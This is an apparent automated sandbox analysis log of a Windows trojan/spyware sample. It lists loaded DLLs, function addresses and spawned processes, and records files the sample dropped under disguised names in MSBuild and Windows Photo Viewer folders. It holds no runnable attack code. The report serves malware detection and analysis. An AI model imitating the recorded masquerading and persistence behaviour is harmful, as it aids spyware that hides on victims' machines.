                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_0038D4400_2_0038D440
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_003777EF0_2_003777EF
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_0036286B0_2_0036286B
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_0038D8EE0_2_0038D8EE
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_0036E9B70_2_0036E9B7
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_003919F40_2_003919F4
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_00373E0B0_2_00373E0B
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_00384F9A0_2_00384F9A
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_0036EFE20_2_0036EFE2
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeCode function: 5_2_00007FFD9BAA0DA75_2_00007FFD9BAA0DA7
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeCode function: 5_2_00007FFD9BC53C1F5_2_00007FFD9BC53C1F
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeCode function: 5_2_00007FFD9BC553FA5_2_00007FFD9BC553FA
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeCode function: 5_2_00007FFD9BC55BD35_2_00007FFD9BC55BD3
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeCode function: 5_2_00007FFD9BC552F25_2_00007FFD9BC552F2
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeCode function: 5_2_00007FFD9BC551F25_2_00007FFD9BC551F2
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeCode function: 5_2_00007FFD9BC549645_2_00007FFD9BC54964
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeCode function: 5_2_00007FFD9BC561285_2_00007FFD9BC56128
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeCode function: 5_2_00007FFD9BC400EB5_2_00007FFD9BC400EB
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeCode function: 5_2_00007FFD9BC457BD5_2_00007FFD9BC457BD
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeCode function: 5_2_00007FFD9BC42F7D5_2_00007FFD9BC42F7D
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeCode function: 5_2_00007FFD9BC50F3D5_2_00007FFD9BC50F3D
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeCode function: 5_2_00007FFD9BC556FA5_2_00007FFD9BC556FA
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeCode function: 5_2_00007FFD9BC53DF25_2_00007FFD9BC53DF2
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeCode function: 5_2_00007FFD9BC555FA5_2_00007FFD9BC555FA
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeCode function: 5_2_00007FFD9BC554FA5_2_00007FFD9BC554FA
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9BAAECB913_2_00007FFD9BAAECB9
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9BAE934D13_2_00007FFD9BAE934D
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9BABAE1D13_2_00007FFD9BABAE1D
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9BABC7F013_2_00007FFD9BABC7F0
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9BABC36C13_2_00007FFD9BABC36C
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9BABAE5A13_2_00007FFD9BABAE5A
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9BAA0DA713_2_00007FFD9BAA0DA7
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9BC9CAF413_2_00007FFD9BC9CAF4
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9BC8826013_2_00007FFD9BC88260
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9BC55BD313_2_00007FFD9BC55BD3
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9BC552F213_2_00007FFD9BC552F2
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9BC551F213_2_00007FFD9BC551F2
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9BC5496413_2_00007FFD9BC54964
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9BC5612813_2_00007FFD9BC56128
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9BC400EB13_2_00007FFD9BC400EB
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9BC457BD13_2_00007FFD9BC457BD
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9BC42F7D13_2_00007FFD9BC42F7D
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9BC50F3D13_2_00007FFD9BC50F3D
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9BC556FA13_2_00007FFD9BC556FA
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9BC5567D13_2_00007FFD9BC5567D
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9BC53C9D13_2_00007FFD9BC53C9D
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9BC74E2C13_2_00007FFD9BC74E2C
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9C167E0A13_2_00007FFD9C167E0A
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9C16926213_2_00007FFD9C169262
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9C1741A113_2_00007FFD9C1741A1
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9C16768D13_2_00007FFD9C16768D
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\AFgebewE.log 9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: String function: 0037EB78 appears 39 times
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: String function: 0037F5F0 appears 31 times
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: String function: 0037EC50 appears 56 times
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: dxgidebug.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: dwmapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: riched20.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: usp10.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: msls31.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: policymanager.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: msvcp110_win.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: pcacli.dllJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: version.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: ktmw32.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: dlnashext.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: wpdshext.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: slc.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                          Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: version.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: ktmw32.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: mmdevapi.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: devobj.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: ksuser.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: avrt.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: audioses.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: powrprof.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: umpdc.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: msacm32.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: midimap.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: dwrite.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeSection loaded: dpapi.dllJump to behavior
                          Source: CJF0Ri1HrG.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@18/280@2/1
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_00366C74 GetLastError,FormatMessageW,0_2_00366C74
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_0037A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_0037A6C2
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Program Files (x86)\windows photo viewer\en-GB\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\EMydcNjR.logJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeMutant created: NULL
